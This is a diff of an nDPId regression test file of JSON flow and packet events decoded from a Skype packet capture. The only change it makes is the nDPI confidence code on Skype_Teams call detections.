00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1431969657511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657511,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIpxPw3E+7utRq+gShaASOJAwmQAAAgQFrAQCCApNea1+PiLFlwEDAwk="} 
@@ -220,19 +220,19 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQSRAAEAGrlLAqAEi1cezr8NznFXnJeTHAAAAALAC\/\/+4YAAAAgQFtAEDAwUBAQgKPiLJgQAAAAAEAgAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QmIAAEARVi\/AqAEiQTffJjLdnE8AIJ1Im8QCCqRVDPPz90033q\/EDoSNqvvC54ua"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+eZEAAEARtmzAqAEinTfrrzLdnEgAKiUSm8YCMvX5DXLyjY07d4zs9r3Rfjeqbt6RlQe5nLyOBDZmjA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+H6wAAEAReNbAqAEiQTffKzLdnEIAKjdVm8gCRata2g4WRHPEL7\/NhH8e4p0ZaFQg5mWNPjrWv1AvJA=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4T0EAAEARk9HAqAEinTc4oTLdnEwAJGHem8oC2K8VAwXZ2I4FcvndU1pGdzS9eSLWH0xc+w=="} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4VhMAAEARqOnAqAEib91KETLdnFYAJFy+m8wCfUg82Gg6DnsozSUd0tlDoiZPS7EFljPm7g=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431969658463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969658463,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxVw3Nt\/WNx5yXkyKASOJA3OAAAAgQFrAQCCApO2zlGPiLJgQEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1431969658464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658464,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kRFAAEAGXnHAqAEi1cezr8NznFXnJeTIbf1jcoAQECyOCgAAAQEICj4iydlO2zlG"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658978,"flow_last_seen":1431969658978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658978,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -249,146 +249,146 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1431969659189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659189,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0y0dAAEAG3E3AqAEinTg0LMN0AbuAxvN73A2f1IAQECyVyAAAAQEICj4izKhMZDEW"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3kJUAAEARCA3AqAEiQTffEjLdgQkAIzBxm84CB+tg2yEaM9\/bL8TBCQEYokW3ou6uIFeA"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAABBYQoAAEAROAbAqAEinTeCmjLdnEUALTFnm9ACrELw0MyN5alTGXUohI4skjQwNKD1mI1L+u5IA2eq73xPAw=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5DEcAAEARjD7AqAEiQTffLTLdnEwAJedsm9ICSKWpAVcx8I7JZ8adPdtcTNxD1Y7ygdStLzI="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyadkAAEARfcfAqAEinTg0GDLdnEEAHr+2m9QCPz6lPkIa5+HaiHK3kAac8KWOvw=="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1BWcAAEAR4iHAqAEinTg0LTLdnEwAIdjym9YCeMy7FyJwEm6ud1zY3LUeAZMSqKDeqQ=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 